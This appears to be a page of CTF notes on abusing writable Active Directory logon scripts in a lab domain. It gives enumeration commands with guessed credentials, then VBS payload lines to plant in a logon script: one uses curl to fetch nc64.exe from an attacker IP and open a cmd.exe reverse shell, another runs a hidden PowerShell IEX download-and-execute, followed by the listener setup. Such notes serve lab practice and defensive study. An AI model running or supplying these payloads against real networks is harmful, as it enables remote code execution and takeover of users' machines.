> For the complete documentation index, see [llms.txt](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/active-directory/logon-script-abuse.md).

# Logon Script Abuse

### Check if you can update Logon script in SMB

```
crackmapexec smb $RHOST -u library -p library --shares
```

### Check if a logon script is configured for your target users

{% code overflow="wrap" %}

```bash
Kali> bloodhound.py -u 'library' -p 'library' -v --zip -c All -ns $RHOST -d baby2.vl -dc dc.baby2.vl
# Ensure you configure DC FQDN name in host file 
Kali> cme ldap $RHOST -u library -p library --bloodhound -ns $RHOST -c all
```

{% endcode %}

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2FBzs2N1DGDd3zPV2i1Sja%2Fimage.png?alt=media&amp;token=8c35e799-666d-4322-9eae-b51218a48d56" alt=""><figcaption></figcaption></figure>

### Add vbs functions to the script

```bash
# Add the following to the script somewhere. 
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.251/privesc/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.251 1234 -e cmd.exe"
```

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2F49arwrrek1RPPIhBr5JC%2Fimage.png?alt=media&amp;token=0914b394-34e3-4bd6-a907-30b53767329c" alt=""><figcaption></figcaption></figure>

Another example:&#x20;

{% code overflow="wrap" %}

```bash
Set oShell = CreateObject("Wscript.Shell")
oShell.Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://10.8.0.251/shell.ps1')" 
```

{% endcode %}

### Wait for a moment to get this script running while preparing the reverse shell&#x20;

```bash
# HTTP Server
sudo python3 -m http.server 80

# Netcat listner
nc -nlvp 1234 
```
